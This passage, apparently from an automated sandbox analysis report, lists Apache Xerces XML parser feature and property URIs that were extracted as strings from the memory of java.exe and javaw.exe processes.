Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations#2
Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations#i
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations9
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsalS9
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsatedDat;
Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationss
Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/include-comments
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/include-comments0
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesKR
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicateslder
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesp
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/namespace-growthS
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/namespace-growtha
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd:
Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdSA
Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdc
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdnt:
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsng
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant2
Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantZ
Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | String found in binary or memory: http://apache.org/xml/features/validate-annotations
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotations;c
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotationsitera
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees#
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees1
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesS
          Source: java.exe, 0000000A.00000003.410458502.0000000014C3B000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesap1
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/dynamic
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/dynamic3
          Source: java.exe, 0000000A.00000003.410458502.0000000014C3B000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/dynamicperty;
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking=
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingSi=
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvik
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultA
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultC
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueeDefiniB
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schemaK~
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef#5
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefttp://D
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefdom/:
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefk
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefs
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef-node-
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language3
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-languageS
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude1
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/D
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node#
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node9
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
          Source: javaw.exe, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-nameC?
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-size
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-sizes
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryK
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factorys
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner/apach7
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scannerKS
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor5
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processorg5
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerk
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerl.o8
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager3
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver7
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolvers
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolvert
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
          Source: javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
          Source: java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporterSE
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool3d
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-bindern
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
          Source: java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context#9
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context:
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-contextc
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver=
          Source: javaw.exe, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
          Source: javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation-manageron
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory7
          Source: java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory;
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factorypt7
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd:
          Source: java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/dtda:
          Source: javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
